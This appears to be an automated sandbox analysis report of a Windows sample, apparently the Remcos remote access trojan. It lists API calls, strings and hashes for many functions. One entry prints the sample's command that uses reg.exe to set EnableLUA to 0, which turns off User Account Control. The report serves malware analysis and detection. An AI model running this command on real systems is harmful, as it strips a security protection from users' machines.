                                                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                  Strings
                                                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandle$CreateProcess
                                                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                  • API String ID: 2922976086-4183131282
                                                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                  Strings
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                  • Rmc-UCDCW8, xrefs: 00407715
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-UCDCW8
                                                                                  • API String ID: 0-2680998245
                                                                                  • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                  • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                  • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                  • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                  • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                  • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                  • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                  • String ID: KeepAlive | Disabled
                                                                                  • API String ID: 2993684571-305739064
                                                                                  • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                  • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                  APIs
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                  • String ID: Alarm triggered
                                                                                  • API String ID: 614609389-2816303416
                                                                                  • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                  • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                  Strings
                                                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                  • API String ID: 3024135584-2418719853
                                                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                  • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                  APIs
                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                  • _free.LIBCMT ref: 0044943D
                                                                                    • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                  • _free.LIBCMT ref: 00449609
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                  • String ID:
                                                                                  • API String ID: 1286116820-0
                                                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                  APIs
                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                    • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 2180151492-0
                                                                                  • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                  • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                  • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                  • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                  • String ID:
                                                                                  • API String ID: 313313983-0
                                                                                  • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                  • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 336800556-0
                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 336800556-0
                                                                                  • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                  • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free
                                                                                  • String ID:
                                                                                  • API String ID: 3170660625-0
                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                                                  • String ID:
                                                                                  • API String ID: 2951400881-0
                                                                                  • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                  • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                                  • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                                  • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                  • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                  • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$lstrcat
                                                                                  • String ID:
